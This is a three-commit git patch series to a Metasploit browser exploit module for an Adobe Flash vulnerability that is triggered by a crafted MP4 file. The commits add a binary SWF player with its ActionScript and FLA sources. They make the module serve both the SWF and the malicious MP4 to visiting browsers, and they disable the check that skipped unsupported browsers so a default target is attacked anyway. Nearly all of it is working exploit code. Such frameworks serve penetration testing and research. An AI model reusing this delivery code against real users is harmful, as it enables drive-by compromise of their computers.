From b0db18674c06358a24b9630c17d319801d4f5f31 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 8 Mar 2012 15:05:12 -0600
Subject: [PATCH 1/3] Test out new player code

---
 data/exploits/mp4player.swf                   | Bin 0 -> 462 bytes
 .../windows/browser/adobe_flash_sps.rb        |  29 +++++++++++++-----
 2 files changed, 21 insertions(+), 8 deletions(-)
 create mode 100755 data/exploits/mp4player.swf

diff --git a/data/exploits/mp4player.swf b/data/exploits/mp4player.swf
new file mode 100755
index 0000000000000000000000000000000000000000..01f40382a92080b2323334944b6b129fa40ff7dc
GIT binary patch
literal 462
zcmV;<0WtnVS5pa>0ssJboNZB0Q`0~kec5c9r3DKeXL8W-=)r^I9}t*9K#LX-3Z{tS
zr4!PHR?<yumQwrzdh!^?ah&1k$+I^uT>S!m6fbo*Y3V`tu(R*azJ0%>2dfSg&w*P8
zR;Hj<ne_YpC9_O`PnRgc+xHv%;IP?xcNDZm7`^Yr^0<4_JN@wFX?f+@^UCVl`iqUt
z>elv4x3=?Y_w}2-xA*QpcsM=tXm)NMh@+q-vFXVsI-Y2RZ3J8#Ds&KpVF!LF1ovfK
z_^5JO&QL29LjkeuaIak#vDRxTKqzX`lgBZ-tp*R_N$L5`-Sn*A*x@~iyX|NiQQ)28
z^NkT}Aa@5;@RN<K#2FF-hK~j;Cn<m#wxPZOwHR>~M;xsh>SQ{}7;+daMHo&(K@Cb*
zOWz3AkrY8qO0F!-ys7U}SKA1)s^f``G<=}s+-fBYCMst;jr>CJy|1ykm`s4#qcpa>
zkT8%ez)l0kTwQ_XH5^74lub$b)G+?F05xz_=Uu79t${N1PNb%5uAcipwJq385&zcK
z3ROhqN+~|p%H)X1-k)+EEEV(6C4h7E)P9k>uJ+q%Sp1Sdf1H(mul>n>;<DoZ0)P92
E(M7rJA^-pY

literal 0
HcmV?d00001

diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb
index eec489617c..ed682ede34 100644
--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -69,8 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 			register_options(
 				[
-					OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
-					OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
+					OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
 				], self.class)
 	end
 
@@ -94,19 +93,25 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Avoid the attack if the victim doesn't have the same setup we're targeting
 		if my_target.nil?
 			print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
-			send_not_found(cli)
-			return
+			#send_not_found(cli)
+			#return
+			my_target = targets[0]
 		end
 
 		# The SWF requests our MP4 trigger
 		if request.uri =~ /\.mp4$/
 			print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
-			#print_error("Sorry, not sending you the mp4 for now")
-			#send_not_found(cli)
 			send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
 			return
 		end
 
+		# The SWF request itself
+		if request.uri =~ /\.swf$/
+			print_status("Sending SWF to #{cli.peerhost}:#{cli.peerport}...")
+			send_response(cli, @swf, {'Content-Type'=>'flash/swf'})
+			return
+		end
+		
 		# Set payload depending on target
 		p = payload.encoded
 
@@ -140,8 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
-		mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
-		swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"
+		swf_uri = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"
 
 		html = %Q|
 		<html>
@@ -166,8 +170,17 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		@mp4 = create_mp4
+		@swf = create_swf
 		super
 	end
+	
+	def create_swf
+		path = ::File.join( Msf::Config.install_root, "data", "exploits", "mp4player.swf" )
+		fd = ::File.open( path, "rb" )
+		swf = fd.read(fd.stat.size)
+		fd.close
+		return swf		
+	end
 
 	def create_mp4
 		ftypAtom = "\x00\x00\x00\x20"                   #Size

From 3e6cbe948613cdd81b5eef52118decf8afacf162 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 8 Mar 2012 15:23:10 -0600
Subject: [PATCH 2/3] Add source code to the player

---
 data/exploits/mp4player.as  |  22 ++++++++++++++++++++++
 data/exploits/mp4player.fla | Bin 0 -> 5211 bytes
 2 files changed, 22 insertions(+)
 create mode 100644 data/exploits/mp4player.as
 create mode 100755 data/exploits/mp4player.fla

diff --git a/data/exploits/mp4player.as b/data/exploits/mp4player.as
new file mode 100644
index 0000000000..a0ace07a91
--- /dev/null
+++ b/data/exploits/mp4player.as
@@ -0,0 +1,22 @@
+function randText(newLength:Number):String{
+  var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+  var alphabet:Array = a.split("");
+  var randomLetter:String = "";
+  for (var i:Number = 0; i < newLength; i++){
+    randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
+  }
+  return randomLetter;
+}
+
+var connect_nc:NetConnection = new NetConnection();
+connect_nc.connect(null);
+
+var stream_ns:NetStream = new NetStream(connect_nc);
+stream_ns.onStatus = function(p_evt:Object):Void { }
+
+
+video.attachVideo(stream_ns);
+
+stream_ns.play(randText(Math.floor(Math.random() * 8) + 4) + ".mp4");
+
+
diff --git a/data/exploits/mp4player.fla b/data/exploits/mp4player.fla
new file mode 100755
index 0000000000000000000000000000000000000000..5a77fb2f33c8c8dadfbb4e6c03329ab127f5fc64
GIT binary patch
literal 5211
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

literal 0
HcmV?d00001


From 1271368b6f3fb0418006afadb3b43e9d614723a4 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 8 Mar 2012 15:37:06 -0600
Subject: [PATCH 3/3] Redirect to a trailing slash to make sure relative
 resources load properly

---
 modules/exploits/windows/browser/adobe_flash_sps.rb | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb
index ed682ede34..50ce693493 100644
--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
 			#send_not_found(cli)
 			#return
-			my_target = targets[0]
+			my_target = targets[1]
 		end
 
 		# The SWF requests our MP4 trigger
@@ -108,7 +108,14 @@ class Metasploit3 < Msf::Exploit::Remote
 		# The SWF request itself
 		if request.uri =~ /\.swf$/
 			print_status("Sending SWF to #{cli.peerhost}:#{cli.peerport}...")
-			send_response(cli, @swf, {'Content-Type'=>'flash/swf'})
+			send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'})
+			return
+		end
+		
+		# Redirect to a trailing slash so relative paths work properly
+		if resource_uri != "/" and not request.uri.index("#{resource_uri}/")
+			uri = resource_uri + "/"
+			send_redirect(cli, uri)
 			return
 		end